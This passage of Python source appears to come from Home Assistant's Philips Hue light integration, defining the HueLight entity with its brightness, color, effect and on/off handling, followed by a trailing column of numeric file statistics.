await group_coordinator.async_refresh()
update_lights_with_group_support = partial(
async_update_items,
bridge,
bridge.api.lights,
{},
async_add_entities,
partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
_setup_rooms_listener,
)
# We add a listener after fetching the data, so manually trigger listener
bridge.reset_jobs.append(
light_coordinator.async_add_listener(update_lights_with_group_support)
)
update_lights_with_group_support()
async def async_safe_fetch(bridge, fetch_method):
"""Safely fetch data."""
try:
with async_timeout.timeout(4):
return await bridge.async_request_call(fetch_method)
except aiohue.Unauthorized as err:
await bridge.handle_unauthorized_error()
raise UpdateFailed("Unauthorized") from err
except aiohue.AiohueException as err:
raise UpdateFailed(f"Hue error: {err}") from err
@callback
def async_update_items(
bridge, api, current, async_add_entities, create_item, new_items_callback
):
"""Update items."""
new_items = []
for item_id in api:
if item_id in current:
continue
current[item_id] = create_item(api, item_id)
new_items.append(current[item_id])
bridge.hass.async_create_task(remove_devices(bridge, api, current))
if new_items:
# This is currently used to setup the listener to update rooms
if new_items_callback:
new_items_callback()
async_add_entities(new_items)
def hue_brightness_to_hass(value):
"""Convert hue brightness 1..254 to hass format 0..255."""
return min(255, round((value / 254) * 255))
def hass_to_hue_brightness(value):
"""Convert hass brightness 0..255 to hue 1..254 scale."""
return max(1, round((value / 255) * 254))
class HueLight(CoordinatorEntity, LightEntity):
"""Representation of a Hue light."""
def __init__(self, coordinator, bridge, is_group, light, supported_features, rooms):
"""Initialize the light."""
super().__init__(coordinator)
self.light = light
self.bridge = bridge
self.is_group = is_group
self._supported_features = supported_features
self._rooms = rooms
if is_group:
self.is_osram = False
self.is_philips = False
self.is_innr = False
self.is_ewelink = False
self.is_livarno = False
self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
self.gamut = None
else:
self.is_osram = light.manufacturername == "OSRAM"
self.is_philips = light.manufacturername == "Philips"
self.is_innr = light.manufacturername == "innr"
self.is_ewelink = light.manufacturername == "eWeLink"
self.is_livarno = light.manufacturername.startswith("_TZ3000_")
self.gamut_typ = self.light.colorgamuttype
self.gamut = self.light.colorgamut
_LOGGER.debug("Color gamut of %s: %s", self.name, str(self.gamut))
if self.light.swupdatestate == "readytoinstall":
err = (
"Please check for software updates of the %s "
"bulb in the Philips Hue App."
)
_LOGGER.warning(err, self.name)
if self.gamut and not color.check_valid_gamut(self.gamut):
err = "Color gamut of %s: %s, not valid, setting gamut to None."
_LOGGER.debug(err, self.name, str(self.gamut))
self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
self.gamut = None
@property
def unique_id(self):
"""Return the unique ID of this Hue light."""
unique_id = self.light.uniqueid
if not unique_id and self.is_group and self.light.room:
unique_id = self.light.room["id"]
return unique_id
@property
def device_id(self):
"""Return the ID of this Hue light."""
return self.unique_id
@property
def name(self):
"""Return the name of the Hue light."""
return self.light.name
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
if self.is_group:
bri = self.light.action.get("bri")
else:
bri = self.light.state.get("bri")
if bri is None:
return bri
return hue_brightness_to_hass(bri)
@property
def _color_mode(self):
"""Return the hue color mode."""
if self.is_group:
return self.light.action.get("colormode")
return self.light.state.get("colormode")
@property
def hs_color(self):
"""Return the hs color value."""
mode = self._color_mode
source = self.light.action if self.is_group else self.light.state
if mode in ("xy", "hs") and "xy" in source:
return color.color_xy_to_hs(*source["xy"], self.gamut)
return None
@property
def color_temp(self):
"""Return the CT color value."""
# Don't return color temperature unless in color temperature mode
if self._color_mode != "ct":
return None
if self.is_group:
return self.light.action.get("ct")
return self.light.state.get("ct")
@property
def min_mireds(self):
"""Return the coldest color_temp that this light supports."""
if self.is_group:
return super().min_mireds
min_mireds = self.light.controlcapabilities.get("ct", {}).get("min")
# We filter out '0' too, which can be incorrectly reported by 3rd party buls
if not min_mireds:
return super().min_mireds
return min_mireds
@property
def max_mireds(self):
"""Return the warmest color_temp that this light supports."""
if self.is_group:
return super().max_mireds
if self.is_livarno:
return 500
max_mireds = self.light.controlcapabilities.get("ct", {}).get("max")
if not max_mireds:
return super().max_mireds
return max_mireds
@property
def is_on(self):
"""Return true if device is on."""
if self.is_group:
return self.light.state["any_on"]
return self.light.state["on"]
@property
def available(self):
"""Return if light is available."""
return self.coordinator.last_update_success and (
self.is_group
or self.bridge.allow_unreachable
or self.light.state["reachable"]
)
@property
def supported_features(self):
"""Flag supported features."""
return self._supported_features
@property
def effect(self):
"""Return the current effect."""
return self.light.state.get("effect", None)
@property
def effect_list(self):
"""Return the list of supported effects."""
if self.is_osram:
return [EFFECT_RANDOM]
return [EFFECT_COLORLOOP, EFFECT_RANDOM]
@property
def device_info(self) -> DeviceInfo | None:
"""Return the device info."""
if self.light.type in (
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_ROOM,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_LIGHT_SOURCE,
):
return None
suggested_area = None
if self.light.id in self._rooms:
suggested_area = self._rooms[self.light.id]
return DeviceInfo(
identifiers={(HUE_DOMAIN, self.device_id)},
manufacturer=self.light.manufacturername,
# productname added in Hue Bridge API 1.24
# (published 03/05/2018)
model=self.light.productname or self.light.modelid,
name=self.name,
# Not yet exposed as properties in aiohue
suggested_area=suggested_area,
sw_version=self.light.raw["swversion"],
via_device=(HUE_DOMAIN, self.bridge.api.config.bridgeid),
)
async def async_added_to_hass(self) -> None:
"""Handle entity being added to Home Assistant."""
self.async_on_remove(
self.bridge.listen_updates(
self.light.ITEM_TYPE, self.light.id, self.async_write_ha_state
)
)
await super().async_added_to_hass()
async def async_turn_on(self, **kwargs):
"""Turn the specified or all lights on."""
command = {"on": True}
if ATTR_TRANSITION in kwargs:
command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10)
if ATTR_HS_COLOR in kwargs:
if self.is_osram:
command["hue"] = int(kwargs[ATTR_HS_COLOR][0] / 360 * 65535)
command["sat"] = int(kwargs[ATTR_HS_COLOR][1] / 100 * 255)
else:
# Philips hue bulb models respond differently to hue/sat
# requests, so we convert to XY first to ensure a consistent
# color.
xy_color = color.color_hs_to_xy(*kwargs[ATTR_HS_COLOR], self.gamut)
command["xy"] = xy_color
elif ATTR_COLOR_TEMP in kwargs:
temp = kwargs[ATTR_COLOR_TEMP]
command["ct"] = max(self.min_mireds, min(temp, self.max_mireds))
if ATTR_BRIGHTNESS in kwargs:
command["bri"] = hass_to_hue_brightness(kwargs[ATTR_BRIGHTNESS])
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command["alert"] = "lselect"
del command["on"]
elif flash == FLASH_SHORT:
command["alert"] = "select"
del command["on"]
elif not self.is_innr and not self.is_ewelink and not self.is_livarno:
command["alert"] = "none"
if ATTR_EFFECT in kwargs:
effect = kwargs[ATTR_EFFECT]
if effect == EFFECT_COLORLOOP:
command["effect"] = "colorloop"
elif effect == EFFECT_RANDOM:
command["hue"] = random.randrange(0, 65535)
command["sat"] = random.randrange(150, 254)
else:
command["effect"] = "none"
if self.is_group:
await self.bridge.async_request_call(
partial(self.light.set_action, **command)
)
else:
await self.bridge.async_request_call(
partial(self.light.set_state, **command)
)
await self.coordinator.async_request_refresh()
async def async_turn_off(self, **kwargs):
"""Turn the specified or all lights off."""
command = {"on": False}
if ATTR_TRANSITION in kwargs:
command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10)
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command["alert"] = "lselect"
del command["on"]
elif flash == FLASH_SHORT:
command["alert"] = "select"
del command["on"]
elif not self.is_innr and not self.is_livarno:
command["alert"] = "none"
if self.is_group:
await self.bridge.async_request_call(
partial(self.light.set_action, **command)
)
else:
await self.bridge.async_request_call(
partial(self.light.set_state, **command)
)
await self.coordinator.async_request_refresh()
@property
def extra_state_attributes(self):
"""Return the device state attributes."""
if not self.is_group:
return {}
return {ATTR_IS_HUE_GROUP: self.is_group}
| 32.702128
| 88
| 0.635437
| 2,229
| 18,444
| 5.014805
| 0.155227
| 0.02818
| 0.013777
| 0.020129
| 0.29576
| 0.233405
| 0.219002
| 0.183575
| 0.176955
| 0.148685
| 0
| 0.007822
| 0.279169
| 18,444
| 563
| 89
| 32.760213
| 0.832945
| 0.10052
| 0
| 0.313253
| 0
| 0
| 0.038181
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055422
| false
| 0
| 0.038554
| 0
| 0.183133
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|